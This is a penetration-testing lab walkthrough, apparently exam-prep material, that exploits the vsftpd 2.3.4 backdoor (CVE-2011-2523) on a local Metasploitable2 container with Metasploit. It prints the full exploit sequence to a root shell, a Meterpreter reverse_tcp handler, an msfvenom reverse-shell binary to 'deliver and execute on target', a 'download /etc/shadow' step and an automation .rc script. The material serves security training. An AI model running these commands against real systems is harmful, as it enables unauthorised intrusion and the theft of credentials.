Exam objective: 4.1 Capability selection; 4.2 Network attacks with Metasploit; 4.10 Scripting and BAS.
In this lab you will use msfconsole end-to-end: search → use → set options → exploit → meterpreter. Target: Metasploitable2 vsftpd backdoor (CVE-2011-2523).
sudo docker run --rm -d --name msf2 -p 21:21 -p 4444:4444 tleemcjr/metasploitable2
TARGET=127.0.0.1sudo msfdb init
msfconsole -qmsf6 > search vsftpd 2.3.4
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > info
info shows: description, references (CVE-2011-2523), targets, payloads, Rank: Excellent.
msf6 > set RHOSTS 127.0.0.1
msf6 > set RPORT 21
msf6 > show payloads
msf6 > set PAYLOAD cmd/unix/interact
msf6 > run
You should drop into a cmd shell as root.
id
uname -a
For Linux meterpreter on a real target:
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST <your IP>
msf6 > set LPORT 4444
msf6 > run
Generate a matching binary:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<your IP> LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
# deliver and execute on targetMeterpreter built-ins:
meterpreter > sysinfo
meterpreter > getuid
meterpreter > download /etc/shadow
meterpreter > shell
Save commands in pwn.rc:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 127.0.0.1
set PAYLOAD cmd/unix/interact
run
msfconsole -q -r pwn.rcThis is how BAS frameworks (Caldera, Atomic Red Team) chain exploits.
| Rank | Meaning |
|---|---|
| Excellent | Will not crash service |
| Great | One-shot, reliable |
| Good | Default reliable |
| Normal | Reliable but specific |
| Average | Less reliable |
| Low | Likely to fail |
| Manual | Requires user interaction |
Always pick Excellent / Great in production tests — others may down the service.
For each successful exploit record:
| Field | Value |
|---|---|
| Module | exploit/unix/ftp/vsftpd_234_backdoor |
| CVE | CVE-2011-2523 |
| CVSS v3.1 | 9.8 Critical |
| ATT&CK | T1190 Exploit Public-Facing App |
| Payload | cmd/unix/interact |
| Privilege | root |
| Time-to-exploit | <30 seconds |
- The
search → use → set → runMetasploit workflow. - The difference between
exploit/,auxiliary/andpost/modules. - How
msfvenomgenerates payloads forexploit/multi/handler. - How
.rcscripts automate chained exploitation.